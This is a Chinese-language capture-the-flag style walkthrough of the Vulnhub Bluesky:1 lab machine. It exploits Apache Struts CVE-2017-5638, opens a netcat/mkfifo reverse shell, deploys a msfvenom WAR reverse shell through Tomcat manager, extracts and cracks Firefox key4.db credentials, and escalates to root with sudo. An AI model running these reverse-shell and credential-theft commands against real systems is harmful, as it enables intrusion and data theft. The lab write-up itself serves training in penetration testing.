Vulnhub Bluesky:1
靶机基础信息
要求获取root权限
难度:容易
链接
导入靶机查看是否正常运行
主机的发现与端口检测
因为靶机的地址与kali的地址处于同一网段下可以使用nmap进行查找,找出地址后对地址进行详细的端口扫描
nmap 192.168.1.0/24
nmap -sS -sV -p- -A 192.168.1.105
开放了22,8080端口
Apache Tomcat 版本是9.0.40
扫描目录发现没有什么可以利用的信息
漏洞利用
我们可以通过搜索Tomcat9.0.40查看该版本是否存在漏洞可以利用,但是查询的版本没有可以利用的漏洞
最后在google上发现其他大佬利用的cve-2017-5638获取的权限
https://github.com/jrrdev/cve-2017-5638
https://github.com/mazen160/struts-pwn.git 获取操作命令
将两个文件从github上下载到kali中
查看nc命令是否可以利用,发现不能使用-e反弹shell
python ./exploit.py 'http://192.168.1.105:8080/struts2-showcase/index.action' "nc"
可以使用其他语句进行反弹
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.106 1234 >/tmp/f
python ./exploit.py 'http://192.168.1.105:8080/struts2-showcase/index.action' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.106 1234 >/tmp/f"
获取交互式shell由于靶机环境是python3所以需要使用python3语句
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看viminfo文件 在vim中操作的行为,vim会自动记录下来,保存在 .viminfo 文件中。
cat .viminfo
查看tomcat-users.xml文件获取账号与密码
账号:admin
密码:6mzf3>gfZ.pN8_Mp
进入manager app 尝试登录
发现可以部署war文件可以上传一个war木马反弹shell查看是否能够获取更高的权限
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.106 LPORT=4444 -f war -o shell.war
上传之后执行
http://192.168.1.105:8080/shell/
获取反弹shell
突然发现权限一样没有太大的用处,换种思路继续尝试
ls -a 查询所有文件包括隐藏文件
发现存在.mozilla进入文件可以发现存在key4.db
火狐key4.db存放账号密码
在github上下载firepwd
https://github.com/lclevy/firepwd
通过Python开启服务,将key4.db与logins.json下载到kali中进行破解
python3 -m http.server 8001
wget http://192.168.1.105:8001/key4.db
wget http://192.168.1.105:8001/logins.json
利用脚本破解密码
账号:minhtuan
密码:skysayohyeah
通过ssh进行远程登录
提权
sudo -l 查看可利用权限
查看结果为all可以利用所有语句直接使用sudo su进行提权获取root权限
来源:freebuf.com 2021-01-30 12:55:48 by: WAFmax
请登录后发表评论
注册